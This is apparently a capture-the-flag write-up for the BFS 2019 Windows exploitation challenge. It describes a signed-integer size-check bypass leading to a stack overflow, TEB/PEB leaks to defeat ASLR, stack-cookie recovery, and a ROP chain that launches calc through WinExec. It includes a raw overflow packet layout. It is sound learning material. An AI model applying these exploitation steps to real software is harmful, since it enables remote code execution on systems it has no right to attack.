- Introduction
- Initial Dynamic Analysis
- Statically Identifying the Vulnerability
- Strategy
- Preparing the Exploit
- Building a ROP Chain
- See Exploit in Action
- Contact
Having enjoyed and succeeded in solving a previous BFS Exploitation Challenge from 2017,
I've decided to give the 2019 BFS Exploitation Challenge a try. It is a Windows 64 bit executable
for which an exploit is expected to work on a Windows 10 Redstone machine.
The challenge's goals were set to:
- Bypass ASLR remotely
- Achieve arbitrary code execution (pop calc or notepad)
- Have the exploited process properly continue its execution
Spare me all the boring details, I want to
Running the file named 'eko2019.exe' opens a console application that seemingly
waits for and accepts incoming connections from (remote) network clients.
Quickly checking out the running process' security features using Sysinternals
Process Explorer shows that DEP and ASLR are enabled, but Control Flow Guard is not. Good.
Further checking out the running process dynamically using tools such as Sysinternals
TCPView, Process Monitor or simply running netstat could have been an option right now,
but personally I prefer diving directly into the code using my static analysis tool of choice,
IDA Pro (I recommended following along with your favourite disassembler / decompiler).
Having disassembled the executable file and looking at the list of identified functions,
the maximum number of functions that need to be analyzed for weaknesses was as little as
17 functions out of 188 in total - with the remaining ones being known library functions,
imported functions and the main() function itself.
Navigating to and running the disassembled code's main() function through
the Hex-Rays decompiler and putting some additional effort into renaming functions,
variables and annotating the code resulted in the following output:
By looking at the code and annotations shown in the screenshot above, we can see there is
a call to a function in line 19 which creates a listening socket on TCP port 54321, shortly followed
by a call to accept() in line 27. The socket handle returned by accept() is then passed as an argument
to a function handle_client() in line 36. Keeping in mind the goals of this challenge, this is probably
where the party is going to happen, so let's have a look at it.
As an attacker, what we are going to look for and concentrate on are functions within the server's
executable code that process any kind of input that is controlled client-side. All with the goal in mind
of identifying faulty program logic that hopefully can be taken advantage of by us. In this case, it is the
two calls to the recv() function in lines 21 and 30 in the screenshot above which are responsible for
receiving data from a remote network client.
The first call to recv() in line 21 receives a hard-coded number of 16 bytes into a "header" structure.
It consists of three distinct fields, of which the first one at offset 0 is "magic", a second at offset 8 is
"size_payload" and the third is unused.
By accessing the "magic" field in line 25 and comparing it to a constant value "Eko2019", the server
ensures basic protocol compatibility between connected clients and the server. Any client packet
that fails in complying with this magic constant as part of the "header" packet is denied further
processing as a consequence.
By comparing the "size_payload" field of the "header" structure to a constant value in line 27,
the server limits the field's maximum allowed value to 512. This is to ensure that a subsequent call to
recv() in line 30 receives a maximum number of 512 bytes in total. Doing so prevents the destination
buffer "buf" from being written to beyond its maximum size of 512 bytes - too bad!
If this sanity check wasn't present, it would have allowed us to overwrite anything that follows the
"buf" buffer, including the return address to main() on the stack. Overwriting the saved return address
could have resulted in straightforward and reliable code execution.
Skimming through this function's remaining code (and also through all the other remaining functions)
doesn't reveal any more code that'd process client-side input in any obviously dangerous way, either.
So we must probably have overlooked something and -yes you guessed it- it's in the processing of
the "pkthdr" structure.
A useful pointer to what the problem could be is provided by the hint window that appears
as soon as the mouse is hovered over the comparison operator in line 27. As it turns out, it is a
signed integer comparison, which means the size restriction of 512 can successfully be bypassed
by providing a negative number along with the header packet in "size_payload"!
Looking further down the code at line 30, the "size_payload" variable is typecast to a 16 bit integer
type as indicated by the decompiler's LOWORD() macro. Typecasting the 32 bit "size_payload"
variable to a 16 bit integer effectively cuts off its upper 16 bits before it is passed as a size argument
to recv(). This enables an attacker to cause the server to accept payload data with a size of up to
65535 bytes in total. Sending the server a respectively crafted packet effectively bypasses the
intended size restriction of 512 bytes and successfully overwrites the "buf" variable on the stack
beyond its intended limits.
If we wanted to verify the decompiler's results or if we refrained from using a decompiler entirely
because we preferred sharpening or refreshing our assembly comprehension skills instead, we could
just as well have a look at the assembler code:
- the "jle" instruction indicates a signed integer comparison
- the "movzx eax, word ptr..." instruction moves 16 bits of data
from a data source to a 32 bit register eax, zero extending its
upper 16 bits.
Alright, before we can start exploiting this vulnerability and take control of the server process'
instruction pointer, we need to find a way to bypass ASLR remotely. Also, by checking out the
handle_client() function's prologue in the disassembly, we can see there is a stack cookie that
will be checked by the function's epilogue which eventually needs to be taken care of .
In order to bypass ASLR, we need to cause the server to leak an address that belongs to
its process space. Fortunately, there is a call to the send() function in line 45, which sends
8 bytes of data, so exactly the size of a pointer in 64 bit land. That should serve our purpose just fine.
These 8 bytes of data are stored into a _QWORD variable "gadget_buf" as the result of a call to the
exec_gadget() function in line 44.
Going further up the code to line 43, we can see self-modifying code that uses the
WriteProcessMemory() API function to patch the exec_gadget() function with whatever data
"gadget_buf" contains.
The "gadget_buf" variable in turn is the result of a call to the copy_gadget() function in line 41
which is passed the address of a global variable "g_gadget_array" as an argument.
Looking at the copy_gadget() function's decompiled code reveals that it takes an integer argument,
swaps its endianness and then returns the result to the caller.
In summary, whatever 8 bytes the "g_gadget_array" at position "gadget_idx % 256" points to will be
executed by the call to exec_gadget() and its result is then sent back to the connected client.
Looking at the cross references to "g_gadget_array" which is only initialized during run-time,
we can find a for loop that initializes 256 elements of the array "g_gadget_array" as part of
the server's main() function:
Going back to the handle_client() function, we find that the "gadget_idx" variable is initialized
with 62, which means that a gadget pointed to by "p_gadget_array[62]" is executed by default.
The strategy is getting control of the "gadget_idx" variable. Luckily, it is a stack variable adjacent
to the "buf[512]" variable and thus can be written to by sending the server data that exceeds
the "buf" variable's maximum size of 512 bytes. Having "gadget_idx" under control allows us
to have the server execute a gadget other than the default one at index 62 (0x3e).
In order to be able to find a reasonable gadget in the first place, I wrote a little Python script
that mimics the server's initialization of "g_gadget_array" and then disassembles all its
256 elements using the Capstone Engine Python bindings:
I spent quite some time reading the resulting list of gadgets trying to find a suitable
gadget to be used for leaking a qualified pointer from the running process, but with
partial success only. Knowing I must have been missing something, I still settled with
a gadget that would manage to leak the lower 32 bits of a 64 bit pointer only, for the
sake of progressing and then fixing it the other day:
Using this gadget would modify the pointer that is passed to the call to exec_gadget(),
making it point to a location other than what the "p" pointer usually points to, which
could then be used to leak further data.
Based on working around some limitations by hard-coding stuff, I still managed to
develop quite a stable exploit including full process continuation. But it was only after a
kind soul asked me whether I hadn't thought of reading from the TEB that I got on the
right track to writing an exploit that is more than just quite stable. Thank you :-)
The TEB holds vital information that can be used for bypassing ASLR, and it is accessed
via the gs segment register on 64 bit Windows systems. Looking through the list of
gadgets for any occurence of "gs:" yields a single hit at index 0x65 of the
"g_gadget_array" pointer.
Acquiring the current thread's TEB address is possible by reading from gs:[030h]. In order to
have the gadget that is shown in the screenshot above to do so, the rcx register must first be
set to 0x30.
The rcx register is the first argument to the exec_gadget() function, which is loaded
from the "p" variable on the stack. Like the "gadget_idx variable", "p" is adjacent to the
overflowable buffer, hence overwritable as well. Great.
By sending a particularly crafted sequence of network packets, we are now given the ability
to leak arbitrary data of the server thread's TEB structure. For example, by sending the following
packet to the server, gadget number 0x65 will be called with rcx set to 0x30.
[0x200*'A'] + ['\x65\x00\x00\x00\x00\x00\x00\x00'] + ['\x30\x00\x00\x00\x00\x00\x00\x00']
Sending this packet will overwrite the target thread's following variables on the stack and will
cause the server to send us the current thread's TEB address:
[buf] + [gadget_idx] + [p]
The following screenshot shows the Python implementation of the leak_teb() function used by
the exploit.
With the process' TEB address leaked to us, we are well prepared for leaking further information
by using the default gagdet 62 (0x3e), which dereferences arbitrary 64 bits of process memory pointed
to by rcx per request:
In turn, leaking arbitrary memory allows us to
- bypass DEP and ASLR
- identify the stack cookie's position on the stack
- leak the stack cookie
- locate ourselves on the stack
- eventually run an external process
In order to bypass ASLR, the "ImageBaseAddress" of the target executable must be acquired
from the Process Environment Block which is accessible at gs:[060h]. This will allow for relative
addressing of the individual ROP gadgets and is required for building a ROP chain that bypasses
Data Execution Prevention.
Based on the executable's in-memory "ImageBaseAddress", the address of the WinExec() API
function, as well as the stack cookie's xor key can be leaked.
What's still missing is a way of acquiring the stack cookie from the current thread's stack frame.
Although I knew that the approach was faulty, I had
initially leaked the cookie by abusing the fact that
there exists a reliable pointer to the formatted text that
is created by any preceding call to the printf() function.
By sending the server a packet that solely consisted of
printable characters with a size that would overflow the
entire stack frame but stopping right before the stack
cookie's position, the call to printf() would leak the
stack cookie from the stack into the buffer holding the
formatted text whose address had previously been acquired.
While this might have been an interesting approach, it is an
approach that is error-prone because if the cookie contained
any null-bytes right in the middle, the call to printf() will
make a partial copy of the cookie only which would have
caused the exploit to become unreliable.
Instead, I've decided to leak both "StackBase" and "StackLimit" from the TIB which is part of the TEB
and walk the entire stack, starting from StackLimit, looking for the first occurence of the saved return
address to main().
Relative from there, the cookie that belongs to the handle_client() function's stack frame
can be addressed and subsequently leaked to our client. Having a copy of the cookie
and a copy of the xor key at hand will allow the rsp register to be recovered, which can
then be used to build the final ROP chain.
Now that we know how to leak all information from the vulnerable process that is required for
building a fully working exploit, we can build a ROP chain and have it cause the server to pop calc.
Using ROPgadget, a list of gadgets was created which was then used to craft the following chain:
-
The ROP chain starts at "entry_point", which is located at offset 0x230 of the
vulnerable function's "buf" variable and which previously contained the orignal
return address to main(). It loads "ptr_to_chain" at offset 0x228 into the rsp
register which effectively lets rsp point into the next gadget at 2.).
Stack pivoting is a vital step in order to avoid trashing the caller's stack frame.
Messing up the caller's frame would risk stable process continuation -
This gadget loads the address of a "pop rax" gadget into r12 in preparation for
a "workaround" that is required in order to compensate for the return address
that is pushed onto the stack by the call r12 instruction in 4.). -
A pointer to "buf" is loaded into rax, which now points to the "calc\0" string
-
The pointer to "calc\0" is copied to rcx which is the first argument for the
subsequent API call to WinExec() in 5.). The call to r12 pushes a return address
on the stack and causes a "pop rax" gadget to be executed which will pop the address
off of the stack again -
This gadget causes the WinExec() API function to be called
-
The call to WinExec() happens to overwrite some of our ROP chain on the stack, hence
the stack pointer is adjusted by this gadget to skip the data that is "corrupted" by the
call to WinExec() -
The original return address to main()+0x14a is loaded into rax
-
rbx is loaded with the address of "entry_point"
-
The original return address to main()+0x14a is restored by patching "entry_point"
on the stack -> "mov qword ptr [entry_point], main+0x14a". After that, rsp is adjusted,
followed by a few dummy bytes -
rsp is adjusted so it will slowly slide into its old position at offset 0x230 of
"buf", in order to return to main() and guarantee process continuation -
see 10.)
-
see 10.)
-
see 10.)